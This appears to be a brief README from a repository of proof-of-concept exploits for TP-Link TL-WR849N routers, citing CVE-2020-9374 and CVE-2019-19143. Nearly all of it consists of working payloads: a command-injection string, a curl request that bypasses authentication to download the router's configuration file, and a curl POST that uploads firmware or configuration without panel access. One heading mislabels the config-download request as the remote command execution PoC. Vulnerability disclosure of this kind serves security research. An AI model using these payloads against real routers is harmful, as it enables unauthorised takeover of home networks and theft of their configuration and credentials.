OpenSource Repo with PoC's and vulns found in routers

TP LINK TL-WR849N - REMOTE COMMAND EXECUTION PoC

• [CVE-2020-9374] - TP LINK TL-WR849N - REMOTE COMMAND EXECUTION PoC

Payload: "$(ls)"

TP LINK TL-WR849N - Auth Bypass: Firmware and Configs update

• TP LINK TL-WR849N - REMOTE COMMAND EXECUTION PoC

  Payload: curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin

[CVE-2019-19143] - TP LINK TL-WR849N Firmware and Configs Update

Uploading new firmware without access to the panel

• [CVE-2019-19143] Firmware Update: Uploading new firmware without access to the panel

  Payload:

  curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F data=@conf.bin http://192.168.0.2/cgi/confup